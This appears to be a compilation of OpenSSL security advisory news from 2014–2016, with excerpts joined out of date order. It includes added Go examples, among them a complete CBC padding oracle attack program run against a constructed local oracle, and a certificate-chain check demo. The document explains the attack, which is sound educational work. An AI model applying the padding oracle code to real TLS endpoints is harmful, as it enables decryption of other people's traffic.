Today, OpenSSL released an update advising of problems with the patches that were released last week, on September 22.
The first problem, CVE-2016-6309, was introduced by a patch in OpenSSL 1.1.0a; on an affected build it could result in a crash or even execution of attacker-supplied code, and so in compromise of the patched machine. This issue only affects OpenSSL 1.1.0a, released on 22nd September 2016. OpenSSL 1.1.0 users should therefore upgrade to 1.1.0b.
The second problem, CVE-2016-7052, was introduced by a patch in OpenSSL 1.0.2i; with that patch installed, an attacker could cause a denial of service condition leading to a crash. This issue affects only OpenSSL 1.0.2i, released on 22nd September 2016. OpenSSL 1.0.2i users should therefore upgrade to 1.0.2j.
We are releasing an update to the grading criteria, version 2009m, in response to the OpenSSL vulnerability CVE-2016-2107, announced in the OpenSSL Security Advisory of 3rd May 2016. A man-in-the-middle attacker can exploit this vulnerability as a padding oracle to decrypt traffic when the connection uses an AES-CBC cipher suite and the server uses the AES-NI implementation.
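As an added example, not from the original post and not OpenSSL's code, the Go program below shows how a padding oracle attack of the kind described above recovers CBC plaintext one byte at a time, using only ciphertext and a yes/no answer per query. The oracle here is a constructed stand-in for the leaked signal (it reports whether the padding decrypted cleanly; in CVE-2016-2107 the signal was a distinguishable error from the AES-NI code path), the key and message are constructed, and PKCS#7 padding stands in for TLS padding. The attack logic itself is the general CBC padding oracle attack, including the guard against the false positive on the last byte.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// padPKCS7 appends PKCS#7 padding. TLS padding is laid out slightly differently,
// but the attack only needs the oracle to distinguish good from bad padding.
func padPKCS7(b []byte, bs int) []byte {
	n := bs - len(b)%bs
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// unpadPKCS7 strips padding, reporting false on any malformed trailer.
func unpadPKCS7(b []byte, bs int) ([]byte, bool) {
	if len(b) == 0 || len(b)%bs != 0 {
		return nil, false
	}
	n := int(b[len(b)-1])
	if n == 0 || n > bs {
		return nil, false
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, false
		}
	}
	return b[:len(b)-n], true
}

// Oracle models a CBC endpoint (a constructed stand-in for the vulnerable
// server) that leaks one bit per record: whether the padding was well-formed.
type Oracle struct{ block cipher.Block }

func NewOracle(key []byte) (*Oracle, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return &Oracle{block: block}, nil
}

// Encrypt returns IV || CBC ciphertext, as the victim would put on the wire.
func (o *Oracle) Encrypt(pt []byte) []byte {
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		panic(err)
	}
	padded := padPKCS7(pt, aes.BlockSize)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(o.block, iv).CryptBlocks(ct, padded)
	return append(iv, ct...)
}

// PaddingValid is the leaked signal the attacker gets to query.
func (o *Oracle) PaddingValid(ivct []byte) bool {
	if len(ivct) < 2*aes.BlockSize || len(ivct)%aes.BlockSize != 0 {
		return false
	}
	pt := make([]byte, len(ivct)-aes.BlockSize)
	cipher.NewCBCDecrypter(o.block, ivct[:aes.BlockSize]).CryptBlocks(pt, ivct[aes.BlockSize:])
	_, ok := unpadPKCS7(pt, aes.BlockSize)
	return ok
}

// Attack recovers the plaintext of IV || ciphertext using only the oracle:
// for each block C_i it learns D_K(C_i) byte by byte by submitting a forged
// previous block that makes the decrypted tail look like valid padding, then
// XORs the result with the real previous block (or the IV).
func Attack(oracle func([]byte) bool, ivct []byte) []byte {
	bs := aes.BlockSize
	var recovered []byte
	for off := bs; off+bs <= len(ivct); off += bs {
		prev, target := ivct[off-bs:off], ivct[off:off+bs]
		inter := make([]byte, bs) // D_K(target), filled from the last byte backwards
		forged := make([]byte, bs)
		for i := bs - 1; i >= 0; i-- {
			pad := byte(bs - i)
			for j := i + 1; j < bs; j++ {
				forged[j] = inter[j] ^ pad // known bytes set to produce the wanted pad value
			}
			for g := 0; g < 256; g++ {
				forged[i] = byte(g)
				probe := append(append([]byte{}, forged...), target...)
				if !oracle(probe) {
					continue
				}
				// Last byte only: a hit could also mean the tail decrypted to
				// 02 02 (or longer). Perturb the byte before it and re-query;
				// only a genuine 01 padding survives that change.
				if i == bs-1 {
					probe[bs-2] ^= 0xff
					if !oracle(probe) {
						continue
					}
				}
				inter[i] = byte(g) ^ pad
				break
			}
		}
		for k := 0; k < bs; k++ {
			recovered = append(recovered, inter[k]^prev[k])
		}
	}
	pt, _ := unpadPKCS7(recovered, bs)
	return pt
}

func main() {
	key := []byte("0123456789abcdef") // constructed demo key; the attacker never sees it
	o, err := NewOracle(key)
	if err != nil {
		panic(err)
	}
	secret := []byte("Cookie: session=cafef00d; constructed sample")
	wire := o.Encrypt(secret)
	fmt.Printf("recovered: %q\n", Attack(o.PaddingValid, wire))
}
```

Each byte costs at most 256 oracle queries (plus one confirmation query for the last byte of a block), so a full record is recovered in a few thousand queries. The defence is to make the oracle disappear: constant-time MAC-then-padding handling, or an AEAD suite where no padding exists.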
The OpenSSL team has announced a fix for a high severity vulnerability (CVE-2015-1793) that allows certificate forgery. During certificate verification, OpenSSL (starting from versions 1.0.1n and 1.0.2b) will attempt to find an alternative certificate chain if the first attempt to build such a chain fails. An error in the implementation of this logic means that an attacker could cause certain checks on untrusted certificates to be bypassed, such as the CA flag, enabling them to use a valid leaf certificate to act as a CA and "issue" an invalid certificate. This issue impacts any application that verifies certificates, including SSL/TLS/DTLS clients and SSL/TLS/DTLS servers using client authentication. It affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n and 1.0.1o.
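As an added example, not from the original post and not OpenSSL's code, the Go program below shows the check that this bug let an attacker bypass: a certificate whose cA flag is false must never be accepted as an issuer, however valid it is as a leaf. It builds a small constructed PKI (root CA, an ordinary server certificate, and a rogue certificate signed with that server certificate's key) using Go's crypto/x509, which enforces the cA flag and the keyCertSign key usage on every issuer in the chain, and shows that the honest chain verifies while the rogue one is rejected. The names and serial numbers are constructed.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// certKey pairs a parsed certificate with its private key.
type certKey struct {
	cert *x509.Certificate
	key  *ecdsa.PrivateKey
}

// mint issues a certificate for cn. If parent is nil the certificate is
// self-signed; otherwise it is signed with parent's key, whether or not the
// parent is entitled to sign (issuance never checks that; verification must).
func mint(cn string, serial int64, isCA bool, parent *certKey) (*certKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		BasicConstraintsValid: true, // the cA flag is explicitly asserted or denied
		IsCA:                  isCA,
		KeyUsage:              x509.KeyUsageDigitalSignature,
	}
	if isCA {
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	} else {
		tmpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}
	}
	parentCert, signer := tmpl, key
	if parent != nil {
		parentCert, signer = parent.cert, parent.key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parentCert, &key.PublicKey, signer)
	if err != nil {
		return nil, err
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		return nil, err
	}
	return &certKey{cert: cert, key: key}, nil
}

// verify builds a chain from leaf to root through the supplied intermediates,
// as a TLS client would; every issuer must carry cA=true and keyCertSign.
func verify(leaf, root *x509.Certificate, intermediates ...*x509.Certificate) error {
	roots := x509.NewCertPool()
	roots.AddCert(root)
	inters := x509.NewCertPool()
	for _, c := range intermediates {
		inters.AddCert(c)
	}
	_, err := leaf.Verify(x509.VerifyOptions{
		Roots:         roots,
		Intermediates: inters,
		KeyUsages:     []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	})
	return err
}

// Result holds the verification outcome for the honest chain and for the
// rogue chain; a nil RogueErr would be exactly the bypass CVE-2015-1793 enabled.
type Result struct {
	LegitErr error
	RogueErr error
}

// Demo stands up a root CA, an ordinary server leaf (cA=false), and a rogue
// certificate "issued" by that leaf, then verifies both against the root.
func Demo() (Result, error) {
	root, err := mint("Example Test Root CA", 1, true, nil)
	if err != nil {
		return Result{}, err
	}
	leaf, err := mint("www.example.com", 2, false, root)
	if err != nil {
		return Result{}, err
	}
	rogue, err := mint("login.example.com", 3, false, leaf)
	if err != nil {
		return Result{}, err
	}
	return Result{
		LegitErr: verify(leaf.cert, root.cert),
		RogueErr: verify(rogue.cert, root.cert, leaf.cert),
	}, nil
}

func main() {
	r, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Println("honest leaf:", r.LegitErr)
	fmt.Println("rogue cert signed by leaf:", r.RogueErr)
}
```

The rogue certificate has a perfectly good signature; it is rejected only because the verifier refuses to treat a cA=false certificate as an issuer. That refusal is the check the alternative-chain logic in the affected OpenSSL versions skipped, which is why the fix matters even for deployments whose trusted roots are all in order.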
Over the past year we have seen overwhelming interest in SSL library exploits, and FREAK ("Factoring RSA EXPORT Keys") is another one. The full impact is not yet known, because the flaw was baked into the design of secure web communications: browsers, web clients and hosts negotiate the strongest encryption "allowed," falling back to weaker "export" cipher suites as required. The most recent list of affected browsers appears to include Internet Explorer, Chrome on Mac OS and Android, Safari on Mac OS and iOS, BlackBerry Browser, and Opera on Mac OS and Linux.
Last week (on June 5th), OpenSSL published an advisory detailing a number of serious problems. Of these, CVE-2014-0224 will be the most problematic for most deployments because it can be exploited via an active network (man-in-the-middle) attack.
This vulnerability allows an active network attacker to inject ChangeCipherSpec (CCS) messages to both sides of a connection and force them to commit to their keys before all key material is available. Weak keys are negotiated as a result. If you’re interested in the details, Adam Langley published a good technical analysis.
Although virtually all versions of OpenSSL are vulnerable, this problem is exploitable only if (1) both sides use OpenSSL and (2) the server uses a vulnerable version of OpenSSL from the 1.0.1 branch.
The good news is that most browsers don’t rely on OpenSSL, which means that most browser users won’t be affected. However, Android browsers do use OpenSSL and are vulnerable to this attack. Additionally, many command-line and similar programmatic tools use OpenSSL. A particularly interesting target will be various VPN products, provided they are based on OpenSSL (OpenVPN, for example).
Over at SSL Labs, we’ve been testing a remote check for CVE-2014-0224 since Friday. Satisfied that the test is identifying vulnerable hosts correctly, yesterday we ran a scan against the SSL Pulse dataset. The results are that about 49% of servers are vulnerable. About 14% (of the total number) are exploitable because they’re running a version from the newer 1.0.1 branch of OpenSSL. The rest are probably not exploitable, but should be upgraded because it’s possible that there are other ways to exploit this problem.
If you’d like to test your servers, the latest version of SSL Labs incorporates a check for CVE-2014-0224.
Original: It’s the Thursday before June’s Patch Tuesday, and Microsoft’s Advance Notification has just gone live. In addition, there was an advisory about new fixes for OpenSSL, which comes quite soon after the Heartbleed vulnerability and the numerous exploits it enabled.
OpenSSL Cookbook is a free ebook based around one chapter of my in-progress book Bulletproof SSL/TLS and PKI. The appendix contains the SSL/TLS Deployment Best Practices document (re-published with permission from Qualys). In total, there are about 50 pages of text covering the OpenSSL essentials, starting with installation, then key and certificate management, and finally cipher suite configuration.